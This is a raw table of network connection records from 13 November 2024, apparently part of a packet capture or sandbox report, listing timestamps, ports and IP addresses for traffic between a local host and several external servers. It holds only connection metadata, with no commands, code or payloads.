Nov 13, 2024 20:39:52.311863899 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311875105 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311885118 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.311918974 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.311918974 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.312052965 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.312063932 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.312104940 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.312104940 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.312324047 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.312355995 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.312376976 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.312411070 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.312434912 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.312443018 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.312447071 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.312454939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.312477112 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.312493086 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.312493086 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.328269958 CET	49971	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.331756115 CET	49972	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.335705042 CET	49972	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.335716963 CET	443	49972	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.337610960 CET	49972	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.337615967 CET	443	49972	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.338015079 CET	49969	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.338031054 CET	443	49969	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.338419914 CET	49969	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.338423967 CET	443	49969	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.340965986 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.340993881 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.341011047 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.341245890 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.341264009 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.341448069 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.367635012 CET	49968	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.367646933 CET	443	49968	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.368249893 CET	49968	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.368253946 CET	443	49968	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.368870020 CET	49967	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.368875980 CET	443	49967	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.369611979 CET	49967	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.369616985 CET	443	49967	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.383239985 CET	49971	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.383261919 CET	443	49971	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.387844086 CET	443	49974	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:52.390938997 CET	49971	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.390949965 CET	443	49971	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.391638994 CET	49974	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:52.391647100 CET	443	49974	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:52.393110991 CET	443	49974	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:52.393172026 CET	49974	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:52.397036076 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.397056103 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.397063971 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.397073030 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.397099018 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.397118092 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.397124052 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.397187948 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.397187948 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.415946960 CET	49974	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:52.416059017 CET	443	49974	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:52.416769981 CET	49974	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:52.416780949 CET	443	49974	20.96.153.111	192.168.2.5
Nov 13, 2024 20:39:52.422625065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.422636032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.422641993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.422661066 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.422671080 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.422682047 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.422683954 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.422694921 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.422707081 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.422708035 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.422724962 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.422739983 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.424923897 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.424958944 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425040960 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425051928 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425064087 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425081968 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425082922 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425093889 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425098896 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425106049 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425120115 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425124884 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425132036 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425139904 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425146103 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425158024 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425167084 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425175905 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425188065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425195932 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425200939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425211906 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425220013 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425235987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425241947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425246954 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425266027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425271988 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425277948 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425288916 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425298929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425312042 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425323009 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425324917 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425354958 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425369978 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425410986 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425442934 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425483942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425496101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425523996 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425554991 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425565958 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425578117 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425594091 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425595045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425607920 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425610065 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425621033 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425631046 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425632000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425647020 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425647974 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425663948 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425664902 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425679922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425693035 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425700903 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425703049 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425713062 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425724030 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425735950 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425739050 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425746918 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425754070 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425760031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425772905 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425779104 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425802946 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425807953 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425820112 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425831079 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425846100 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425848007 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425858021 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425862074 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425870895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425885916 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425909996 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425920010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425930977 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425942898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.425955057 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425967932 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.425983906 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426250935 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426261902 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426273108 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426290035 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426316023 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426328897 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426342010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426367044 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426368952 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426386118 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426403046 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426426888 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426438093 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426470041 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426484108 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426495075 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426505089 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426516056 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426517963 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426532984 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426544905 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426546097 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426562071 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426574945 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426578045 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426584959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426590919 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426598072 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426625013 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426644087 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426645041 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426660061 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426703930 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426713943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426724911 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426736116 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426753044 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426774025 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426855087 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426865101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426882029 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426892996 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426901102 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426904917 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.426927090 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.426939964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.427524090 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427558899 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.427561998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427573919 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427602053 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.427618027 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427628994 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427639961 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427649975 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.427651882 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427675962 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.427697897 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.427722931 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427732944 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427745104 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427753925 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.427757978 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427769899 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427778959 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.427783012 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.427804947 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.427819014 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.428410053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.428421974 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.428433895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.428446054 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.428448915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.428459883 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.428468943 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.428494930 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.428519011 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.428550959 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.428577900 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.428582907 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.428601027 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.428618908 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.428710938 CET	443	49966	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.428752899 CET	49966	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.457772017 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.457812071 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.457868099 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.457880974 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.458112955 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.458465099 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.458471060 CET	443	49970	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.458745003 CET	49970	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.460407972 CET	49974	443	192.168.2.5	20.96.153.111
Nov 13, 2024 20:39:52.462800980 CET	443	49972	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.462976933 CET	443	49972	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.463432074 CET	49972	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.465260983 CET	49979	443	192.168.2.5	52.178.17.2
Nov 13, 2024 20:39:52.465308905 CET	443	49979	52.178.17.2	192.168.2.5
Nov 13, 2024 20:39:52.465384960 CET	49979	443	192.168.2.5	52.178.17.2
Nov 13, 2024 20:39:52.466124058 CET	49979	443	192.168.2.5	52.178.17.2
Nov 13, 2024 20:39:52.466135025 CET	443	49979	52.178.17.2	192.168.2.5
Nov 13, 2024 20:39:52.466171026 CET	443	49969	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.466267109 CET	443	49969	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.466342926 CET	49969	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.469675064 CET	49980	443	192.168.2.5	52.178.17.2
Nov 13, 2024 20:39:52.469711065 CET	443	49980	52.178.17.2	192.168.2.5
Nov 13, 2024 20:39:52.469870090 CET	49980	443	192.168.2.5	52.178.17.2
Nov 13, 2024 20:39:52.470581055 CET	49980	443	192.168.2.5	52.178.17.2
Nov 13, 2024 20:39:52.470596075 CET	443	49980	52.178.17.2	192.168.2.5
Nov 13, 2024 20:39:52.471416950 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.471476078 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.471539974 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.471549988 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.471560955 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:52.471585035 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.471612930 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:52.472270012 CET	49981	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:52.472292900 CET	443	49981	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:52.472489119 CET	49981	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:52.472489119 CET	49981	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:52.472512007 CET	443	49981	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:52.495379925 CET	49972	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.495392084 CET	443	49972	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.495409966 CET	49972	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.495417118 CET	443	49972	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.496579885 CET	49969	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.496593952 CET	443	49969	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.498955011 CET	443	49967	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.499134064 CET	443	49967	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.499294043 CET	49967	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.500169039 CET	443	49968	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.500308990 CET	443	49968	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.500366926 CET	49968	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.500579119 CET	49967	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.500585079 CET	443	49967	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.500601053 CET	49967	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.500606060 CET	443	49967	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.500706911 CET	49968	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.500719070 CET	443	49968	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.500727892 CET	49968	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.500731945 CET	443	49968	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.502840042 CET	49982	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.502871037 CET	443	49982	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.502938986 CET	49982	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.503459930 CET	49983	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.503490925 CET	443	49983	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.503541946 CET	49983	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.503679991 CET	49982	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.503694057 CET	443	49982	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.504333973 CET	49984	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.504344940 CET	443	49984	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.504395962 CET	49984	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.504609108 CET	49984	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.504620075 CET	443	49984	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.504784107 CET	49983	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.504795074 CET	443	49983	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.505131960 CET	49985	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.505142927 CET	443	49985	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.505193949 CET	49985	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.505806923 CET	49985	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.505820990 CET	443	49985	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.514853954 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.514873981 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.514905930 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.514909029 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.514914989 CET	443	49973	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:52.514955044 CET	49973	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:52.516777992 CET	443	49971	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.516834021 CET	443	49971	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.516890049 CET	49971	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.516897917 CET	443	49971	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.516944885 CET	49971	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.517101049 CET	49971	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.517107010 CET	443	49971	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.517117023 CET	49971	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:52.517121077 CET	443	49971	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:52.519164085 CET	49986	443	192.168.2.5	13.107.246.45
